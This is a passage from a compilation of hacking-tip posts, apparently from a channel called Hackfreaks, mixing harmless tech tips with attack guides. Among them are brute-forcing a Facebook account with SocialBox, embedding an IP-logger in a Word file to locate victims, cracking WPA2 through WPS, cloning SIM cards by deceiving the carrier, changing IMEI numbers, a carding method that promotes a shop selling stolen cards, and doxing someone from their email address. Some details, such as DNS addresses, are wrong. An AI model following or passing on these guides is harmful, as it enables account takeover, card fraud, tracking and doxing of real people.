It's saved as name, as you used for the firstname. If you don't know partner, use any best friend information, there are few apps like tellonym.me, instagram.com, snapchat.com to fetch as much information as you need.


Bruteforcing the account


$ pkg install nano -y


$ git clone https://github.com/TunisianEagles/SocialBox.git; cd SocialBox; chmod +x *.sh


$ nano install-sb.sh


Edit all sudo lines, only remove sudo:

sudo apt-get update

After:

apt update


Exit — ctrl+x — y (yes) — enter.


$ ./install-sb.sh


$ cp -R $HOME/test.txt $PWD


$ ./SocialBox.sh


CP means we are copying our text file from cupp folder to home, then from home to the socialbox folder. Do it, you need in social a wordlist which has been created. If you don't want to copy it :


Choice >  1

Enter Facebook ID / Email / Username / Number: 671393100

Enter wordlist path : $HOME/cupp/test.txt


Now the Bruterforcer will start to read your password list, or the word list you specified, and then try to test the password in the background using YOUR IP address. I have also tried to crack a Facebook account a few times, please use a VPN!



Enjoy! Follow us for more...

HOW TO FIND DELETED YOUTUBE VIDEOS / WORKING


Step 1: Go to YoutubeThe very first thing to do is head over to the Youtube page. We are not on Youtube’s page to view the video as it is already deleted from the platform. Just log in as usual to Youtube, and go to the section where the deleted Youtube video is listed and which you want to retrieve. Get the link to the deleted youtube video which you want to retrieve.


Step 2: Go to WayBackMachineWayBackMachine is an internet archive project made to achieve all the good things that existed in the internet. You can find an archive of almost all sites on the very website. You just have to get the URL of the website whose history you want to see and give a simple search on this WayBackMachine site. They consist of more than 531 billion of pages archive. ( at the time I am writing this post). This project was mainly developed for developers or historians or researchers to provide them with the internet archive so they can get information about the past things that existed on this internet.

Now After you get the link to the deleted Youtube video which you want to retrieve. Open a New Tab in your respective browser. After opening the tab, put archive.org in the URL bar. or google search ‘Way Back Machine’ and select the first option. By either way, you will get to the respective website. You will see the WayBackMachine’s website with a lot of icons and shits in it. Just look for the search box with the go button. Now the main show begins lol.


Step 3: Paste the UrlNow you are on the WayBackMachine page. Head over to the search and go part of the page as mentioned in the picture above. Now Paste the Youtube deleted video’s URL that you have got from step 1. or you can go to the next tab where the Youtube page is open to copy-paste the Youtube deleted videos URL. After putting the respective URL in the search box click the go button and see the magic lol.

Step 4: Check Browse HistoryPut the link in the search box which is next to the Waybackmachine. Thoroughly make sure you have a copy and paste the correct URL. Putting the incorrect URL will give you a completely different result than you expected. So make sure you have entered the correct URL and hit the enter button from the keyboard to search for that URL. And now grab popcorn and stay back and let the site find that respective video for you.


Step 5: Enjoy it!


Enjoy! Follow us for more...

Viral Page Free Traffic

 

Download now


Enjoy! Follow us for more...

How to infect Microsoft Office documents?

 

 Greetings to Hackfreaks readers!  Today we'll talk about how Microsoft Word is infected and why you shouldn't open unverified documents, pdfs, etc. Brought to you by hackfreaks official  Viruses, tracking, refs - these are exactly the things that integrate well into Word.  Usually, people do not check documents for vulnerabilities, and antiviruses do not sound the alarm, so attackers are actively using this.  We, in turn, will not embed a specific virus, but simply consider this method using the example of IPloggers : https://iplogger.org/


 Instructions:


 1. Create a new Word document> Go to the "insert" tab> item "integrate video from the Internet"

 2. Select YouTube> write the desired channel name and select the video.  Everything.  Our video in file

 (you can choose any other site, not necessarily YouTube)

 3. Save and close the document> run WinRAR> find our document

 4. Click on the document and its internal content opens> open the word folder> see the document.xml file

 5. Drag it to the desktop and open it through notepad> find a link to our video in it and replace it with the IPlogger link

 6. Save and return to Winrar


 Everything.  Now if you open our Word document, the movie will remain there.  Even if you hover the cursor, a link to the video will be displayed, and not to IPlogger. And keep supporting hackfreaks official. After a person tries to watch the video, we will instantly receive his coordinates and IP address.  Such manipulations in Word can be done with absolutely anything, so there is only one conclusion - check everything and always


Enjoy! Follow us for more...

4 Proven Ways To Find a Website's IP Address

 ​

This tutorial teaches you how to find the IP address of a website. You can do this by using your computer's built-in "traceroute" function, or by downloading and using a free traceroute app for your iPhone or Android.


♨#1 ON WINDOWS♨


 • Open your PC and click on start menu. Search For "cmd" (Without quotes)


• Right Click on cmd and click on "Run as administration"


• Now enter a command -


              ping website address -t


   Ex. - ping google.com -t


• Now hit enter. You will get it.


===============================


♨# 2 ON MAC OS♨


• Open Spotlight (Click the magnifying glass-shaped icon in the top-right corner of the screen.) 


• Search for Network Utility and open it. After that Click on Traceroute tab in network utility.


• Now Enter website address in input box and click on trace button You will see the IP address of website


================================


♨ #3 ON ANDROID ♨


• Download and install PingTools Network Utility app then open it.


• Tap ☰. It's in the upper-left corner of the screen. A pop-out menu will appear.


 • Now tap Traceroute Enter Website address and click on trace button 


=================================


♨ #4 ON IPHONE ♨


•Install and Open Inettools app


•Click on Traceroute then Click on adress bar and input website address (e.g. google.com) 


•Click on start. You will see the IP address of website. 


📝Note - Do not try to find ip address of Government sites (.gov, .gov.in, ac.in etc)


Enjoy! Follow us for more...

How to Add Lock Option to the Taskbar in Windows 10.

 ❇️ 

🔹Step 1: First of all, right-click anywhere on your desktop and select New > Shortcut.


🔹Step 2: On the “Type the location of the item” field, enter the path –


Rundll32.exe user32.dll,LockWorkStation


🔹Step 3: Once done, click on the ‘Next‘ button.


🔹Step 4: Now in the ‘Type a name for this shortcut’ field, enter ‘Lock’ and click on the ‘Finish‘ button.


🔹Step 5: Now you will find a Lock Shortcut icon on the desktop. Right-click on it, and select ‘Properties‘


🔹Step 6: Click on the ‘Change icon’ button and browse the icon that resembles the lock option best for you.


🔹Step 7: Once done, right-click on the shortcut file, and select ‘Pin to taskbar’ or ‘Pin to Start’


🔹Step 8: Now, whenever you want to lock your PC, click on the Taskbar lock icon.


      ✅ That’s it! You are done. This is how you can add the lock option to the Start menu and Taskbar in Windows 10.


Enjoy! Follow us for more...

How to Hide Data inside Images


🔹Step 1: Create a folder. Name it anything you wish, say hide.


🔹Step 2: Now put anything and everything you want to hide in this folder. Text files, other images, executables - anything. Also, put the image behind which you want to hide the files in the same directory, say “image.jpg”.


🔹Step 3: Now we need to archive this folder. You can use your choice of compression tool for this (I recommend the free and open-source 7-zip). So now we have a zip file hide.zip containing all of the data we want to hide behind an image.


🔹Step 4: You should have your image, say image.jpg (inside of which we’ll hide our data) in the same directory as hide.zip (next to it).


🔹Step 5: Now simply open up the command prompt and move to the folder where image.jpg and hide.zip are located using the cd command:cd PATH For example: cd C:\Folder cd desktop


🔹Step 6: Now we type in the following command:copy /b image.jpg + hide.zip output.jpg


  ✅ That's it, you're done. Hope you will find it useful.


Enjoy! Follow us for more...

Using nbtstat to Find a Computer Name

 

🌀Have you ever wanted to know what computer belongs to what IP address?


🔹This information can come in very handy when trying to troubleshoot network issues or see if there are devices on your network that don't belong there.


🔹Just knowing the IP address of a device on your network may not be enough information to figure out what you need to know.


🔹Sure you can ping an IP address but that only tells you if there is connectivity.


🔹Sometimes you can use the -a switch with the ping command and see if you get lucky and it resolves the IP address to a name.


🔹Another command line utility you can use to help you in your quest for finding the computer name associated with an IP address is the DOS command nbtstat to find NetBIOS computer names if you use NetBIOS on your network.


🔹Just open a command prompt by going to Start, Run then type in cmd and click OK. Here are the available switches you can use with the nbtstat command.


🔹The one you want to use to find the host name associated with the IP address is nbtstat –a followed by the IP address. In the following example you can see 192.168.1.2 is the IP address, Jim is the computer name and WORKGROUP is the workgroup name.


❇️ I hope you learn something new 


Enjoy! Follow us for more...

What is network sniffing ?


🌀Computers communicate by broadcasting messages on a network using IP addresses. Once a message has been sent on a network, the recipient computer with the matching IP address responds with its MAC address.


🌀Network sniffing is the process of intercepting data packets sent over a network.This can be done by the specialized software program or hardware equipment. Sniffing can be used to ;


▫️Capture sensitive data such as login credentials

▫️Eavesdrop on chat messages

▫️Capture files have been transmitted over a network


🌀The following are protocols that are vulnerable to sniffing


• Telnet

• Rlogin

• HTTP

• SMTP

• NNTP

• POP

• FTP

• IMAP


The above protocols are vulnerable if login details are sent in plain text

Enjoy! Follow us for more...

HOW TO HACK WIFI USING ANDROID WPA2 WPS Routers


Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:

*Nexus 7

*Galaxy Ace/S1/S2/S3

*Nexus One

*Desire HD


🔰

Download and install bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.

*To install an APK file, you will need to allow installation from unknown sources in your Security menu.


🔰

Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for the third time, your device is most likely not supported.

*Your device must be rooted in order to run bcmon.


🔰

Download and install Reaver. Reaver is a program developed to crack the WPS PIN in order to retrieve the WPA2 passphrase. 


🔰

Launch Reaver. Tap the Reaver for Android icon in your App drawer. After confirming that you are not using it for illegal purposes, Reaver will scan for available access points. Tap the access point you want to crack to continue.

*You may need to verify Monitor Mode before proceeding. If this is the case, bcmon will open again.

The access point you select must accept WPS authentication. Not all routers support this.


🔰

Verify your settings. In most cases you can leave the settings that appear at their default. Make sure that the "Automatic advanced settings" box is checked.


🔰

Start the cracking process. Tap the "Start attack" button at the bottom of the Reaver Settings menu. The monitor will open and you will see the results of the ongoing crack displayed.

*Cracking WPS can take anywhere from 2-10+ hours to complete, and it is not always successful




Enjoy! Follow us for more...

HOW TO GET ACCESS TO BLOCKED WEBSITES


Let us discuss all the methods i.e., from easier methods to harder ones.


1. Recast the URL


This trick works for the sites which are hosted on VPN and on Dedicated server Environment and have an unverified SSL installed for that domain name. To get access to such websites you have to implement 2 simple steps. They are:


1. Go to the address bar of the browser (Any browser)

2. Instead of typing www.websiteURL.com or http://www.WebsiteURL.com, try typing https://www.WebsiteURL.com

So, as the domain is unverified with SSL installation, it will show up a security notice with the options as Proceed anyway or Back to Safety. Here, you have to select the option Proceed Anyway, then you will get an entry ticket to the site.




 


2. DNS Server Replacement


In this method you have to change or replace the DNS server to get access over the blocked websites. Say, DNS server is the container which contains all the information regarding all the sites from the entire world. So, if any country blocks any website IP from their Country IPs, they block it in their own DNS server. Whoever uses those particular DNS servers will not be able to access the blocked websites. MNC Companies, Schools, Colleges generally use this method to block the sites. To bypass this situation we have a simple trick. These methods slightly vary for different users. Just follow the steps below.


For Windows XP users


¶Click Start > Control Panel > Network Connections.

¶Now select your specific Internet connection with access problems, right-click, then select Properties.

¶Left-click Internet Protocol (TCP/IP), and select Properties.

¶Follow the Step 5 instruction given above in properties.


Windows 7, 8, 8.1 and Vista Users


¶For Windows Vista and 7, go to Start > Control Panel > Network and Internet > Network and Sharing Center. If you’re using Windows 8, hit Windows key + C > click Search on the right-hand side > type Control Panel in the search bar > select Control Panel > Network and Internet > Network and Sharing Center.

¶Click Change adapter settings, which is on the left sidebar.

¶Right-click the Internet connection (MTNL, Airtel, BSNL, etc.) on which you’re having trouble accessing websites, and click Properties.

¶Select Internet Protocol Version 4 (TCP/IP), and then click Properties.

¶Click the radio button next to Use the following DNS Server address.

If you want to use Google DNS, enter 8.8.8.8 as the Preferred DNS Server and 8.8.4.4 as the Alternate DNS Server.

¶If you want to use OpenDNS, use 202.67.220.220 and 202.67.222.222 respectively. After entering these, click OK


For iOS device Users


¶Open Settings > tap Wi-Fi > tap the Wi-Fi network the device is connected to.

¶Tap DNS and change the two values to Google DNS or Open DNS (explained in step 5 above). These two values should be separated by a comma and one space (8.8.8.8, 8.8.4.4).


For Android users, these are the steps.


¶Open Settings > tap Wi-Fi.

¶Long press the Wi-Fi network you’re connected to > tap Modify Network.

¶Now tap the box next to Show advanced options. Scroll down.

Tap DHCP > select Static IP > scroll down and modify DNS 1 and DNS 2 (as explained in step 5 above).

¶Click the radio button next to Use the following DNS Server address. If you want to use Google DNS, enter 8.8.8.8 as the Preferred DNS Server and 8.8.4.4 as the Alternate DNS Server. If you want to use OpenDNS, use 202.67.220.220 and 202.67.222.222 respectively. After entering thes

e, click OK.

How to Bypass or Unblock Blocked sites


🌀Today everyone of us is a part of any college,office or any organization.


🌀Everywhere we find free open wifi’s , but the major problem with these are there are many websites which are blocked by the servers of college,ofiice or any organization.


🌀There are different type of securities that are implemented in these server to block some sites like Facebook ,Twitter etc.


🌀So In this post i’ll tell you easy and permanent method to access or bypass blocked sites 


💢 Steps To Bypass Blocked Sites-


 1. Connect your pc or laptop with wifi or your broadband connection in which you want to access blocked websites.


 2. Open command prompt by clicking start and the typing “cmd” and then pressing enter.


 4. 3. Now a command prompt window will appear.


 5. Type ping Websitename (for exp: ping http://facebook.com) and press enter.


 6. Now open your browser and enter the site which you had recently ping.


 7.You will see the site will get opens


● This is very simple method to easily access blocked sites.


Enjoy! Follow us for more...

Watch IPL for Free Using Those Streamable Links


🌀 English - http://www.freeIivetv.ga/sports/english.html

🌀 English HD - http://www.freeIivetv.ga/sports/english-hd.html

🌀 English 4K - http://www.freeIivetv.ga/sports/english4k.html

🌀 Hindi - http://www.freeIivetv.ga/sports/hindi.html

🌀 Hindi HD - http://www.freeIivetv.ga/sports/hindihd.html

🌀 Hindi 4K - http://www.freeIivetv.ga/sports/hindi4k.html

🌀 Tamil - http://www.freeIivetv.ga/sports/tamil.html

🌀 Telugu - http://www.freeIivetv.ga/sports/telugu.html

🌀 Kannada - http://www.freeIivetv.ga/sports/kannada.html

🌀 Bengali - http://www.freeIivetv.ga/sports/bengali.html

🌀 Marathi - http://www.freeIivetv.ga/sports/marathi.html

🌀 Malayalam - http://www.freeIivetv.ga/sports/malyalam.html

    

  Enjoy! Follow us for more...

HOW TO CLONE A SIM


Step 1: Remove the SIM from the phone, place it in the card reader, click read from the card in magic SIM.


When it displays ‘connected’, select crack SIM in the toolbar.



Step 2: Click strong KI and select all of the other find options and then click start.



Once your KI is found and the crack is finished, click the file, save as and save your cracked SIM info to a file.



Step 3: You must click disconnect from the file menu or you will ruin your SIM card. [Important, Otherwise SIM will crack]



Step 4: Once it says disconnected. Remove the SIM. Put the SIM in your phone and see if it still works, it should.



(If not, either you did not unlock your SIM, or you tried to copy it instead of crack and save.)



* Unlock SIM Card *



Go to phone tools, select SIM card, then select unlock SIM, it will prompt for a code.



Call network provider, they will ask for your phone number, your account info, name, and security code, then they will ask why you want to unlock your SIM card, just tell them you need to unlock your SIM to get it to work with your overseas phone or something.



Once they give you the SIM unlock code, enter it, and it will say SIM unlocked.


Step 5: Insert blank SIM card and open USB SIM Card Reader Software not magic SIM at this point.



Step 6: Click connect. It should say ‘No Info Found’ if it is truly blank.



Step 7: Select write to SIM, it will prompt you to select a .dat file, select the one you saved earlier.


Step 8: Now click start, it will take about 10 minutes to write it, once it is complete, it will ask for a security code, enter the security code the network provider gave you, then click Finish.


Enjoy! Follow us for more...

How To Create Your Own Web Hosting Site For FREE!


1: Register Free Domain At: Freenom.com


2: Change Nameservers To:


ns1.byet.org


ns2.byet.org


ns3.byet.org


ns4.byet.org


3: Go To MyOwnFreeHost.Net Sign Up With The Domain & Email Adress.


4: You'll Receive An Email Under 5: Hrs With The Details Of cPanel


Enjoy! Follow us for more...

FIREWALL IN ANY ANDROID DEVICE

 

🌀DESCRIPTION:   firewall is the security in any operating system that disallows all the dangerous IP’s and also the harmful programs to penetrates in the operating system


🔹Steps To Add Firewall In Any Android Device:


✍Step 1. First of all, you need to download and install the cool android app that is NoRoot Firewall the app that will allow you to add firewall feature to your device.


✍Step 2. Now you need to launch the app after installing it in your device. Now you need to click on “Start"....


✍Step 3. Now you need to allow the connection, simply tap on “OK” to continue


✍Step 4. Now you need to move over the “Pending Access” tab and there you will see all the apps that require connecting to the internet. Simply allow them or deny them as per your wish


🌀 That’s it! you are done, now your Android has a Firewall that will be securing your device from various threats.


Enjoy! Follow us for more...

How To Download Youtube Videos Without External Tools Or Extensions On PC


Open Developer Tools in the browser and go to Network tool, or if you’re on Firefox press Ctrl + Shift + Q .


Click Media in the Network tool so that you’ll see only the HTTP requests made to media files, like audio and video files.


Browse to a YouTube video you want to download. You’ll start seeing the requests made by the YouTube page to the audio & video files in the Network tool.


Hover the cursor over the Type column of each request in the tool and look at the media type:


If you want the audio, look for “audio/mp4”.


If you want the video, then look for “video/mp4”.


Note: If you’re using a browser that doesn’t segregate requests (like IE) or doesn’t list the requests made to the audio & video files in YouTube under “Media” (like Chrome), just search the term “audio” or “video” in the search bar in the Network tool.


Once you found a request with the wanted media type (it’ll be of the googlevideo.com 13 domain), click on it, and copy the full URL from where it appears.


Paste the URL in the address bar, remove the range parameter in the query string and press Enter .


The video or audio will open, right-click on the page and select “Save As” to save the file.


If you want both the video and the audio, look for both with the steps above and put them together using any default media editor you have in your computer. It’s actually pretty easy and quick to do so (even with programs like the outmoded Windows Movie Maker).


Enjoy! Follow us for more...

How To Change IMEI Using MTK Engineering Mode App

 


FOLLOW STEPS BELOW.......

Step 1

Open engineering mode » Click on Engineer Mode (MTK) »

Swipe left to Connectivity » click on CDS Information »

Radio Information.


Step 2

Click on phone 1 if you want to change your sim 1 or

choose Phone 2 to change sim 2 IMEI, follow this guide:

For Phone 1: “AT+ EGMR=1,7,”YOUR NEW IMEI

NO” (make sure you add a space in between AT+ &

EGMR)

For Phone 2: “AT+ EGMR=1,10,”YOUR NEW IMEI

NO” (make sure you add a space in between AT+ &

EGMR)


Step 3

Press the “Send At Command” (You should receive a

message that your ‘AT command sent)


Step 4

Reboot and dial *#06# to confirm your new IMEI.


Enjoy! Follow us for more...

ALIEXPRESS CARDING METHOD BY @hacking wolf

 


 Now I will tell you about Aliexpress carding method. Recent times site Aliexpress becomes a favorite place for carders.Brought to you by Hackfreaks.  Previously there were no problems with using CC FULLZ  but now there have been some changes. 


So how to card Aliexpress.


If you want to have successful carding on Aliexpress then first you must need to know process, now I'm going to show you up-to-the-minute Aliexpress Carding Method of 2020, fully Guide and it is working method, but remember that you need to buy valid CC FULLZ in CVV shop online. It will help you complete this process correctly.


A LIST OF WHAT WE NEED FOR ALIEXPRESS CARDING:



1) Facebook account.


2) CC (credit card) - you can find the necessary CC FULLZ in our CVV shop online ss209. The EU CC for instance of Italy, Spain, France, Germany, the Netherlands ... well, in general Europe. As well as very good exotic - New Zealand, Costa Rica and so on.


3) SSH tunnel or Socks (USA). We posts socks (proxies) Daily on Hackfreaks.


4) Compliance with security measures - trukript + virtual + 2VPN (not public).



WE PROCEED TO THE PROCESS:


1) Run the VPN, activate the sock or set up tunnel.


2) Sign up for Aliexpress using your Facebook account.


3) We look at the goods in the aliexpress store for about 15-30 minutes (optional).


4) Next, select the product. Push buy now. Fill in the data for delivery. And then choose the payment method Credit or Debit Card. We drive in data from the card. In the name of the cardholder indicate the name of the recipient of the goods. Then after successful payment we save the card. And we continue to pay for purchases. This is full Aliexpress carding method.brought to you by Hackfreaks.



I remind you that no carding method which works 100%. There are too many different conditions that need to be observed, such as software, quality of CC FULLZ, country of delivery, experience of a carder and a bit of luck. There are also many online stores starting from such as Amazon and eBay and ending with other little known ones. 


Carding is an art and does not like deletants. In order to become successful, you need to learn to spend time and invest in your training. This is the only way to succeed. Join Hackfreaks .Do not look for a carding method that works 100%. If you want to find an easy way to make money on carding, you will not succeed. Only becoming a professional you can call yourself a real carder.


It is very important to have an official supplier. Buy CC FULLZ in verified CVV shop online. You should not pay attention only to the price, on the Internet there are many fake sellers who offer low prices. We receive hundreds of messages from people who have been deceived. Do not buy CC FULLZ in chat rooms, ICQ, from unfamiliar people. Do not trust sellers who say that all the cards that he sells have a high balance. They speak what you want to hear, not what it really is. I hope our warnings will help you to avoid cheating and buying low-quality FULLZ, dumps and CC.


___

 Enjoy! Follow us for more...

HOW TO GET SOMEONES NAME, PICTURES AND INFORMATION WITH ONLY AN EMAIL


Create a facebook page


Go to page role manager 

(https ://www.facebook.com/(your-page-id)/settings/?tab=admin_roles or for example 


Type the email of the person you are trying to dox 


The targets name and surname will be shown below the box, then just search them on facebook and continue your doxing journey.


Enjoy! Follow us for more...

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...